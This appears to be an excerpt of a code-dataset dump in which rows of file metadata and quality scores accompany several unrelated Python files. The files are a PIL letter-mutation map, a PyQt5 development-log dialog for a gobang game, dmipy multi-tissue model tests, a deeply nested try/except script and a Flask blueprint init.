[1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0],
[0,1,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0]]
| 197.19802
| 200
| 0.492745
| 9,803
| 19,917
| 1.00102
| 0.000408
| 1.235504
| 1.48823
| 1.606848
| 0.998777
| 0.998777
| 0.998777
| 0.998777
| 0.998777
| 0.998268
| 0
| 0.494625
| 0.005121
| 19,917
| 100
| 201
| 199.17
| 0.000606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
10868eb7d53918896badaf01bff96b545e4eeff6
| 2,778
|
py
|
Python
|
mutations.py
|
joshbarrass/IFailedTheClassTest
|
e15ca73ed8fff616a2efff38025fa11ce2770af9
|
[
"MIT"
] | null | null | null |
mutations.py
|
joshbarrass/IFailedTheClassTest
|
e15ca73ed8fff616a2efff38025fa11ce2770af9
|
[
"MIT"
] | null | null | null |
mutations.py
|
joshbarrass/IFailedTheClassTest
|
e15ca73ed8fff616a2efff38025fa11ce2770af9
|
[
"MIT"
] | null | null | null |
from PIL import Image
# MUTATIONS lists ways of mutating a letter into another letter. The
# first key is the target letter, and MUTATIONS[target] will return a
# new dict. The second key is the required
# letter. MUTATIONS[target][required] returns the mutation function
# needed to turn the required letter into the target letter.
MUTATIONS = {
"d": {
"P":
lambda im: im.transpose(Image.ROTATE_180),
"p":
lambda im: im.transpose(Image.ROTATE_180),
"b":
lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
"q":
lambda im: im.transpose(Image.ROTATE_180).
transpose(Image.FLIP_LEFT_RIGHT),
},
"P": {
"d":
lambda im: im.transpose(Image.ROTATE_180),
"b":
lambda im: im.transpose(Image.ROTATE_180).
transpose(Image.FLIP_LEFT_RIGHT),
"q":
lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
},
"b": {
"d":
lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
"p":
lambda im: im.transpose(Image.ROTATE_180).
transpose(Image.FLIP_LEFT_RIGHT),
"P":
lambda im: im.transpose(Image.ROTATE_180).
transpose(Image.FLIP_LEFT_RIGHT),
"q":
lambda im: im.transpose(Image.ROTATE_180),
},
"q": {
"p":
lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
"P":
lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
"d":
lambda im: im.transpose(Image.ROTATE_180).
transpose(Image.FLIP_LEFT_RIGHT),
"b":
lambda im: im.transpose(Image.ROTATE_180),
},
#
"U": {
"C": lambda im: im.rotate(90, Image.BILINEAR),
"c": lambda im: im.rotate(90, Image.BILINEAR),
},
"C": {
"U": lambda im: im.rotate(-90, Image.BILINEAR),
"u": lambda im: im.rotate(-90, Image.BILINEAR),
},
#
"M": {
"w": lambda im: im.transpose(Image.ROTATE_180),
"W": lambda im: im.transpose(Image.ROTATE_180),
},
"W": {
"M": lambda im: im.transpose(Image.ROTATE_180),
"m": lambda im: im.transpose(Image.ROTATE_180),
},
"S": {
"z": lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
"Z": lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
},
"Z": {
"s": lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
"S": lambda im: im.transpose(Image.FLIP_LEFT_RIGHT),
},
#
"r": {
"L":
lambda im: im.transpose(Image.FLIP_LEFT_RIGHT).
transpose(Image.ROTATE_180),
},
"L": {
"r":
lambda im: im.transpose(Image.FLIP_LEFT_RIGHT).
transpose(Image.ROTATE_180),
},
}
| 30.866667
| 69
| 0.552196
| 342
| 2,778
| 4.345029
| 0.154971
| 0.30148
| 0.195155
| 0.31965
| 0.811575
| 0.811575
| 0.810229
| 0.810229
| 0.664872
| 0.514132
| 0
| 0.029121
| 0.307775
| 2,778
| 89
| 70
| 31.213483
| 0.74363
| 0.108351
| 0
| 0.4875
| 0
| 0
| 0.016613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0125
| 0
| 0.0125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10abf2acdf2fd16fdea10df9a7e462c67a6c019a
| 14,835
|
py
|
Python
|
final/UI_develop.py
|
pickxiguapi/gobang
|
e74d4c89e67342a89e76d12437812a0f570a7ba2
|
[
"MIT"
] | 2
|
2020-05-31T08:42:05.000Z
|
2021-09-27T08:28:16.000Z
|
final/UI_develop.py
|
pickxiguapi/gobang
|
e74d4c89e67342a89e76d12437812a0f570a7ba2
|
[
"MIT"
] | null | null | null |
final/UI_develop.py
|
pickxiguapi/gobang
|
e74d4c89e67342a89e76d12437812a0f570a7ba2
|
[
"MIT"
] | 1
|
2021-09-27T08:28:19.000Z
|
2021-09-27T08:28:19.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'UI_develop.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_develop(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(700, 530)
self.label = QtWidgets.QLabel(Dialog)
self.label.setGeometry(QtCore.QRect(225, 10, 250, 50))
font = QtGui.QFont()
font.setFamily("微软雅黑")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.textBrowser = QtWidgets.QTextBrowser(Dialog)
self.textBrowser.setGeometry(QtCore.QRect(0, 70, 700, 461))
font = QtGui.QFont()
font.setFamily("微软雅黑")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.textBrowser.setFont(font)
self.textBrowser.setObjectName("textBrowser")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "开发日志"))
self.label.setText(_translate("Dialog", "开 发 日 志"))
self.textBrowser.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'微软雅黑\'; font-size:12pt; font-weight:600; font-style:normal;\">\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年6月26日 Ver1.0.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">完成了判断胜负,落子等基础功能,使用Tkinter完成了基础图形界面,现在可以在一台电脑上通过鼠标点击实现自己和自己对战了。 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年6月27日 Ver1.1.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">解决了边角棋子显示不完全的BUG </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">添加了开始游戏按钮,修改了图形界面响应逻辑 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年6月29日 Ver1.2.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">使用Q-learning写了第一版五子棋AI,效果不佳 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">改变了棋盘界面颜色,现在界面更加清爽了 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">2019年6月30日 Ver1.4.0<span style=\" font-weight:400;\"> </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">改变了五子棋AI的算法,使用alpha-beta剪枝博弈树搜索算法完成第二版五子棋AI。 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">已知BUG:1、玩家对相同位置重复落子被判定为有效 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2、由于程序使用单线程,AI在计算落子位置时界面会未响应 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月1日 Ver1.5.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">解决了重复落子判定问题,优化了五子棋AI在部分棋型情况下的计算速度。 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">2019年7月2日 Ver1.6.0<span style=\" font-weight:400;\"> </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">增加了局域网对战功能,玩家可以选择建立房间和加入房间,房主默认为黑色棋子且先手 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">已知BUG:由于程序是单线程的,所以在对方回合时会造成棋盘未响应,回到我方回合时即恢复正常 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月3日 Ver1.7.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">修复了双人对战功能无法正常进行胜负判定功能的BUG </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">修复了双人对战功能没有开始游戏就能下子的BUG </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月4日 Ver1.8.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">双人对战功能现在可以由房主选择黑/白方和先/后手了,另一方将随房主设置自动应用 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">2019年7月5日 Ver2.0.0 </p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">使用pyQT制作了初始界面和功能选择(人机/人人)界面,现在游戏的可交互性更强了 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">现在人机AI根据搜索深度被分为简单,一般,困难三个难度级别了,可以自由选择挑战 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">已知问题:困难级别AI的计算时间过长,仍然需要优化,在10步棋之后的响应时间达到了2分钟 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月6日 Ver2.1.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">为人机对战模式增加了悔棋、禁手(详细规则见后)、重新开始、退出游戏等功能按钮 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">为人和不同难度的AI制作了不同的头像,按钮制作为配套风格 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\">2019年7月7日 Ver2.2.0 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">在人机对战模式中增加了哪方下子的提示信息 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">增加了落子信息提示框,妈妈再也不用担心我找不到上一步落子位置了! </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Wingdings\'; font-weight:400;\">l</span><span style=\" font-family:\'Times New Roman\'; font-size:7pt; font-weight:400;\"> </span><span style=\" font-weight:400;\">由于局域网对战模式涉及到数据传递问题较难解决,目前增加的功能性按钮均只应用于人机模式 </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:400;\"> </span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; color:#000000;\">附1 禁手规则:该规则开启后对黑方有效</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">1.三、三禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一子落下同时形成两个或两个以上的活三(或嵌四),此步为三三禁手。</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">2.四、四禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一子落下同时形成两个或两个以上的四,活四、冲四、嵌五之四,包括在此四之内。此步为四四禁手。注意:只要是两个“四”即为禁手,无论是哪种四,活四,跳四,冲四都算。</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">3.四、三、三禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一步使一个四,两个活三同时形成。</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">4.四、四、三禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一步使两个四,一个活三同时形成。</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">5.长连禁手</span></p>\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; background-color:#ffffff;\"><span style=\" font-family:\'微软雅黑,sans-serif\'; font-weight:400; color:#000000;\">黑方一子落下形成连续六子或六子以上相连</span><span style=\" font-family:\'Courier New\'; font-weight:400;\"> </span></p></body></html>"))
| 161.25
| 395
| 0.68972
| 2,265
| 14,835
| 4.51479
| 0.109492
| 0.088011
| 0.108058
| 0.096616
| 0.799237
| 0.795228
| 0.795228
| 0.788578
| 0.779386
| 0.779386
| 0
| 0.062951
| 0.074823
| 14,835
| 91
| 396
| 163.021978
| 0.682113
| 0.012403
| 0
| 0.101266
| 1
| 0.012658
| 0.323772
| 0.074848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025316
| false
| 0
| 0.012658
| 0
| 0.050633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52a23f5c32c8ab305448dfb863d538592eb521ea
| 2,985
|
py
|
Python
|
dmipy/core/tests/test_multi_tissue_models.py
|
weningerleon/dmipy
|
6eeb4cf803722ba8c7910c67974bff6a6a01a14e
|
[
"MIT"
] | null | null | null |
dmipy/core/tests/test_multi_tissue_models.py
|
weningerleon/dmipy
|
6eeb4cf803722ba8c7910c67974bff6a6a01a14e
|
[
"MIT"
] | null | null | null |
dmipy/core/tests/test_multi_tissue_models.py
|
weningerleon/dmipy
|
6eeb4cf803722ba8c7910c67974bff6a6a01a14e
|
[
"MIT"
] | null | null | null |
from dmipy.signal_models import cylinder_models, gaussian_models
from dmipy.core import modeling_framework
from dmipy.data.saved_acquisition_schemes import (
wu_minn_hcp_acquisition_scheme)
from numpy.testing import assert_almost_equal
scheme = wu_minn_hcp_acquisition_scheme()
def test_multi_tissue_mc_model():
scheme = wu_minn_hcp_acquisition_scheme()
ball = gaussian_models.G1Ball()
cyl = cylinder_models.C1Stick()
models = [ball, cyl]
S0_responses = [1., 2.]
mt_mc = modeling_framework.MultiCompartmentModel(
models=models, S0_tissue_responses=S0_responses)
mt_mc.set_fixed_parameter('C1Stick_1_lambda_par', 1.7e-9)
mt_mc.set_fixed_parameter('G1Ball_1_lambda_iso', 3e-9)
mt_mc.set_fixed_parameter('C1Stick_1_mu', [0., 0.])
param_dict = {'partial_volume_0': .5, 'partial_volume_1': .5}
E = mt_mc.simulate_signal(scheme, param_dict)
mt_mc_fit = mt_mc.fit(scheme, E)
sig_fracts = mt_mc_fit.fitted_parameters
vol_fracts = mt_mc_fit.fitted_multi_tissue_fractions
vol_fracts_norm = mt_mc_fit.fitted_multi_tissue_fractions_normalized
assert_almost_equal(
sig_fracts['partial_volume_0'], vol_fracts['partial_volume_0'], 2)
assert_almost_equal(
sig_fracts['partial_volume_1'], vol_fracts['partial_volume_1'] * 2., 2)
assert_almost_equal(
vol_fracts_norm['partial_volume_0'], 2 / 3., 2)
assert_almost_equal(
vol_fracts_norm['partial_volume_1'], 1 / 3., 2)
def test_multi_tissue_mc_sm_model():
scheme = wu_minn_hcp_acquisition_scheme()
ball = gaussian_models.G1Ball()
cyl = cylinder_models.C1Stick()
models = [ball, cyl]
S0_responses = [1., 2.]
# generate data
mt_mc = modeling_framework.MultiCompartmentModel(
models=models, S0_tissue_responses=S0_responses)
mt_mc.set_fixed_parameter('C1Stick_1_lambda_par', 1.7e-9)
mt_mc.set_fixed_parameter('G1Ball_1_lambda_iso', 3e-9)
mt_mc.set_fixed_parameter('C1Stick_1_mu', [0., 0.])
param_dict = {'partial_volume_0': .5, 'partial_volume_1': .5}
E = mt_mc.simulate_signal(scheme, param_dict)
# do mc-sm multi tissue model.
mt_mc_sm = modeling_framework.MultiCompartmentSphericalMeanModel(
models=models, S0_tissue_responses=S0_responses)
mt_mc_sm.set_fixed_parameter('C1Stick_1_lambda_par', 1.7e-9)
mt_mc_sm.set_fixed_parameter('G1Ball_1_lambda_iso', 3e-9)
mt_mc_fit = mt_mc_sm.fit(scheme, E)
sig_fracts = mt_mc_fit.fitted_parameters
vol_fracts = mt_mc_fit.fitted_multi_tissue_fractions
vol_fracts_norm = mt_mc_fit.fitted_multi_tissue_fractions_normalized
assert_almost_equal(
sig_fracts['partial_volume_0'], vol_fracts['partial_volume_0'], 2)
assert_almost_equal(
sig_fracts['partial_volume_1'], vol_fracts['partial_volume_1'] * 2., 2)
assert_almost_equal(
vol_fracts_norm['partial_volume_0'], 2 / 3., 2)
assert_almost_equal(
vol_fracts_norm['partial_volume_1'], 1 / 3., 2)
| 39.8
| 79
| 0.743384
| 444
| 2,985
| 4.506757
| 0.15991
| 0.045977
| 0.076462
| 0.035982
| 0.866567
| 0.824588
| 0.806597
| 0.806597
| 0.806597
| 0.784608
| 0
| 0.035346
| 0.156449
| 2,985
| 74
| 80
| 40.337838
| 0.759333
| 0.01407
| 0
| 0.8
| 0
| 0
| 0.135034
| 0
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.033333
| false
| 0
| 0.066667
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52f2e2e599b587ce9ab034c47086001fcec8a2cc
| 2,147
|
py
|
Python
|
scripts/maxblock.py
|
liwt31/unexpected
|
f973896812ad54494a8644fff431fc5202eaef41
|
[
"MIT"
] | null | null | null |
scripts/maxblock.py
|
liwt31/unexpected
|
f973896812ad54494a8644fff431fc5202eaef41
|
[
"MIT"
] | null | null | null |
scripts/maxblock.py
|
liwt31/unexpected
|
f973896812ad54494a8644fff431fc5202eaef41
|
[
"MIT"
] | null | null | null |
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
try:
pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
except: pass
| 48.795455
| 92
| 0.129017
| 64
| 2,147
| 4.328125
| 0.046875
| 0.758123
| 1.061372
| 1.444043
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.851421
| 2,147
| 43
| 93
| 49.930233
| 0.868339
| 0
| 0
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.511628
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 13
|
5e13059baa693d3880349c8edbab3847d47d9076
| 179
|
py
|
Python
|
app/nonlinear_equations/__init__.py
|
sgg10/arsp_solver_api
|
ad1d2f52eea58338d4f26128d5130eb326d529fb
|
[
"MIT"
] | null | null | null |
app/nonlinear_equations/__init__.py
|
sgg10/arsp_solver_api
|
ad1d2f52eea58338d4f26128d5130eb326d529fb
|
[
"MIT"
] | null | null | null |
app/nonlinear_equations/__init__.py
|
sgg10/arsp_solver_api
|
ad1d2f52eea58338d4f26128d5130eb326d529fb
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
nonlinear_equations = Blueprint("nonlinear_equations", __name__, url_prefix='/api/nonlinear_equations/')
from app.nonlinear_equations import routes
| 25.571429
| 104
| 0.832402
| 21
| 179
| 6.666667
| 0.571429
| 0.514286
| 0.385714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 179
| 6
| 105
| 29.833333
| 0.858896
| 0
| 0
| 0
| 0
| 0
| 0.24581
| 0.139665
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
